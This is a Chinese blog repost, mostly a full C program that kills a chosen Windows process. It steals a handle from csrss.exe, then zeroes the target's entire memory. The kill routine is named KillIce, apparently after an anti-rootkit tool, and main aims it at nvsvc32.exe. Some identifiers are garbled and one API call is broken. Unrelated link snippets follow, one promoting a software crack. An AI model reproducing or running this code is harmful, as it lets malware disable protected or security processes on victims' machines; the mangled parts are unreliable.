【转】内存清零KILL进程
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>
#include <tlhelp32.h>
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib") #pragma comment(linker, "/ENTRY:main")
//------------------ 数据类型声明开始 --------------------//
typedef struct _PROCES***ASIC_INFORMATION {
NTSTATUS ExitStatus;
ULONG PebBaseAddress;
ULONG_PTR AffinityMask;
LONG BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCES***ASIC_INFORMATION;
typedef PROCES***ASIC_INFORMATION *PPROCES***ASIC_INFORMATION; typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef enum _SECTION_INHERIT {
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT; typedef struct _MY_PROCESS_INFO {
ULONG PID;
ULONG KPEB;
ULONG CR3;
CHAR Name[16];
ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID; typedef long NTSTATUS; //------------------ 数据类型声明结束 --------------------// //--------------------- 预定义开始 -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATU***UFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define SystemHandleInformation 0x10 #define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }
//--------------------- 预定义结束 -----------------------// //------------------ Native API声明开始 ------------------// typedef DWORD (_stdcall *XXXZwQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
); typedef DWORD (_stdcall *XXXZwOpenProcess)(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId
); typedef DWORD (_stdcall *XXXZwAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
); typedef DWORD (_stdcall *XXXZwDuplicateObject)(
IN HANDLE SourceProcessHandle,
IN PHANDLE SourceHandle,
IN HANDLE TargetProcessHandle,
OUT PHANDLE TargetHandle,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN BOOLEAN InheritHandle,
IN ULONG Options
); typedef DWORD (_stdcall *XXXZwQueryInformationProcess)(
IN HANDLE ProcessHandle,
IN PVOID ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength
); typedef DWORD (_stdcall *XXXZwProtectVirtualMemory)( IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN OUT PULONG NumberOfBytesToProtect,
IN ULONG NewAccessProtection,
OUT PULONG OldAccessProtection
); typedef DWORD (_stdcall *XXXZwWriteVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN ULONG NumberOfBytesToWrite,
OUT PULONG NumberOfBytesWritten OPTIONAL
); typedef DWORD (_stdcall *XXXZwClose)(
IN HANDLE ObjectHandle
); typedef DWORD (_stdcall *XXXZwFreeVirtualMemory)( IN HANDLE ProcessHandle,
IN PVOID *BaseAddress,
IN OUT PULONG RegionSize,
IN ULONG FreeType
); //------------------ Native API声明结束 ------------------// //------------------ 程序正式开始 ------------------// DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0; hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap, &pe32))
{
do
{
if(lstrcmpi(szName,pe32.szExeFile)==0)
{
dwRet=pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap,&pe32));
}
else return 0; if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
return dwRet;
} void KillIce(ULONG dwProcessId)
{
HMODULE hNTDLL = LoadLibrary ("ntdll");
HANDLE ph, h_dup;
ULONG bytesIO;
PVOID buf;
ULONG i;
CLIENT_ID cid1;
OBJECT_ATTRIBUTES attr;
HANDLE csrss_id;
// HANDLE SnapShotHandle;
PROCES***ASIC_INFORMATION pbi;
PVOID p0, p1;
ULONG sz, oldp;
ULONG NumOfHandle;
PSYSTEM_HANDLE_INFORMATION h_info; csrss_id = (HANDLE)GetPidByName("csrss.exe");
attr.Length = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory = 0;
attr.ObjectName = 0;
attr.Attributes = 0;
attr.SecurityDescriptor = 0;
attr.SecurityQualityOfService = 0; cid1.UniqueProcess = csrss_id;
cid1.UniqueThread = 0;
XXXZwOpenProcess ZwOpenProcess;
ZwOpenProcess = (XXXZwOpenProcess)GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwOpenProcess");
ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1); bytesIO = 0x400000;
buf = 0;
XXXZwAllocateVirtualMemory ZwAllocateVirtualMemory;
ZwAllocateVirtualMemory = (XXXZwAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwAllocateVirtualMemory");
ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE); XXXZwQuerySystemInformation ZwQuerySystemInformation;
ZwQuerySystemInformation = (XXXZwQuerySystemInformation)GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO);
NumOfHandle = (ULONG)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4); for (i= 0 ; i<NumOfHandle; i++, h_info++)
{
if ((h_info->ProcessId == (ULONG)csrss_id)&&(h_info->ObjectTypeNumber == 5))
{
XXXZwDuplicateObject ZwDuplicateObject;
ZwDuplicateObject = (XXXZwDuplicateObject)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwDuplicateObject");
XXXZwQueryInformationProcess ZwQueryInformationProcess;
ZwQueryInformationProcess = (XXXZwQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryInformationProcess");
if (ZwDuplicateObject(ph, (PHANDLE)h_info->Handle, (HANDLE)-1, &h_dup,
0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
if (pbi.UniqueProcessId == dwProcessId)
{
MessageBox(0, "目标已确定!", "OK", MB_OK);
XXXZwProtectVirtualMemory ZwProtectVirtualMemory;
ZwProtectVirtualMemory = (XXXZwProtectVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwProtectVirtualMemory");
XXXZwWriteVirtualMemory ZwWriteVirtualMemory;
ZwWriteVirtualMemory = (XXXZwWriteVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwWriteVirtualMemory");
XXXZwClose ZwClose;
ZwClose = (XXXZwClose)GetProcAddress(GetModuleHandle("ZwClose"), "ZwClose");
for (i = 0x1000; i<0x80000000; i = i + 0x1000)
{
p0 = (PVOID)i;
p1 = p0;
sz = 0x1000;
if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
{
ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
}
}
MessageBox(0, "任务已完成!","OK", 0);
ZwClose(h_dup);
break;
}
}
} bytesIO = 0;
XXXZwFreeVirtualMemory ZwFreeVirtualMemory;
ZwFreeVirtualMemory = (XXXZwFreeVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwFreeVirtualMemory");
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE); FreeLibrary(hNTDLL); } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
} void main()
{
ULONG Pid;
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
if (Pid = GetPidByName("nvsvc32.exe"))
{
KillIce(Pid);
}
ExitProcess(0);
}
【转】内存清零KILL进程的更多相关文章
- 内存不足时Android 系统如何Kill进程
[转]内存不足时Android 系统如何Kill进程 大家其实都或多或少知道,Android系统有自已的任务管理器,当系统内存不足时,系统需要KILL一些进程(应用),以回收一部分资源,来保证系统仍可 ...
- PAT乙级 1031. 查验身份证(15) 标志要清零!!!!!!!!!
1031. 查验身份证(15) 时间限制 200 ms 内存限制 65536 kB 代码长度限制 8000 B 判题程序 Standard 作者 CHEN, Yue 一个合法的身份证号码由17位地区. ...
- ubuntu查看系统资源占用(内存,cpu和进程)
http://blog.csdn.net/vivian187/article/details/51476043 http://bluexp29.blog.163.com/blog/static/338 ...
- Linux_CentOS 内存、cpu、进程、端口、硬盘管理
内存.cup 管理 top 命令 top 1.top 命令的第一行: top - :: up :, users, load average: 0.00, 0.02, 0.05 依次对应:系统当前时间 ...
- 学习笔记:Linux下共享内存的方式实现进程间的相互通信
一.常用函数 函数系列头文件 #include <sys/types.h> #include <sys/ipc.h> #include <sys/shm.h> ft ...
- Linux centos7日常运维——监控io性能、free内存命令、ps进程命令、查看网络状态、linux下抓包
一.监控io性能 Linux系统出现了性能问题,一般我们可以通过top.iostat.free.vmstat等命令来查看初步定位问题.其中iostat可以给我们提供丰富的IO状态数据. iostat ...
- Linux:kill 进程
在使用Linux时,出现端口占用.进程已启动(但处于不可控状态)情况时如何处理? 发现已知端口被占用时,可以使用netstat -apn | grep yourPort 来查看占用该端口的进程的pid ...
- ACCESS自动编号清零
ACCESS的数据库,当每次删除所有记录后,表里的一个ID字段(自动编号),无限递增,位数无限扩.当每次执行删除查询时,程序就把“自动编号”型ID字段清零,然后重新从“初始值”开始,解决方法如下: ...
- 2410中断中SRCPND和INTPND清零的疑问
2410中断中SRCPND和INTPND清零的疑问SRCPND是中断源引脚寄存器,某个位被置1表示相应的中断被触发,但我们知道在同一时刻内系统可以触发若干个中断,只要中断被触发了,SRCPND的相应位 ...
- Linux内存点滴:用户进程内存空间
原文出处:PerfGeeks 经常使用top命令了解进程信息,其中包括内存方面的信息.命令top帮助文档是这么解释各个字段的.VIRT , Virtual Image (kb)RES, Residen ...
随机推荐
- mysql 8.0.30 忘记密码登录mysql:
mysql 8.0.30 忘记密码登录mysql: cmd(使用管理员运行)-切换到mysql的bin目录下:一.输入命令:net stop mysql 停止服务: 二.输入命令:mysqld --c ...
- Navicat Premium 16 永久破解激活
Navicat premium是一款数据库管理工具,是一个可多重连线资料库的管理工具,它可以让你以单一程式同时连线到 MySQL.SQLite.Oracle 及 PostgreSQL 资料库,让管理不 ...
- [imx6ull][nand] uboot烧录固件
背景 在调试阶段使用nxp的mfg-tools烧录比较麻烦,故考虑使用uboot指令实现固件烧录 烧录方法 //烧写内核 nand erase 0x4000000 0x800000 tftp zIma ...
- 网络安全(中职组)-B模块:暴力破解
任务环境说明: 服务器场景名称:sql008 服务器场景用户名:administrator:密码:未知(封闭靶机) 1.使用渗透机场景kali中工具扫描服务器场景,将iis的版本号作为flag提交: ...
- 关于EasyExcel的数据导入和单sheet和多sheet导出
读写Excel基本代码 直接复制不一定能用 实体类 @ExcelIgnore 在导出操作中不会被导出 @ExcelProperty 在导入过程中 可以根据导入模板自动匹配字段, 在导出过程中可用于设置 ...
- 对比 elasticsearch 和 mysql
最近阅读了elasticsearch的官方文档,学习了它的很多特性,发现elasticsearch和mysql有很多地方类似,也有很多地方不同.这里做一个对比,帮助大家加深对elasticsearch ...
- vue之头像管理思路
思路是在vant库中使用插件将上传的头像转码存入数据库中.每个用户存一个,不同用户就有不同的头像了.若数据库中没有头像,那么就给一个默认头像 头像上传后端接口: var express = requi ...
- C++库封装JNI接口——实现java调用c++
1. JNI原理概述 通常为了更加灵活高效地实现计算逻辑,我们一般使用C/C++实现,编译为动态库,并为其设置C接口和C++接口.用C++实现的一个库其实是一个或多个类的简单编译链接产物.然后暴露其实 ...
- python之爬虫二
10正则表达式 正则表达式(regular expression)是一种字符串匹配模式或者规则,它可以用来检索.替换那些符合特定规则的文本.正则表达式几乎适用于所有编程语言,无论是前端语言 JavaS ...
- [云计算]概念辨析:云计算 [IaaS/PaaS/SaaS & 公有云/私有云/混合云]
1 云计算(Cloud Computing) 1.0 云计算的发展 1.1 概念 "云"实质上就是一个[网络], 狭义上讲,云计算就是一种提供资源的网络,使用者可以随时获取&quo ...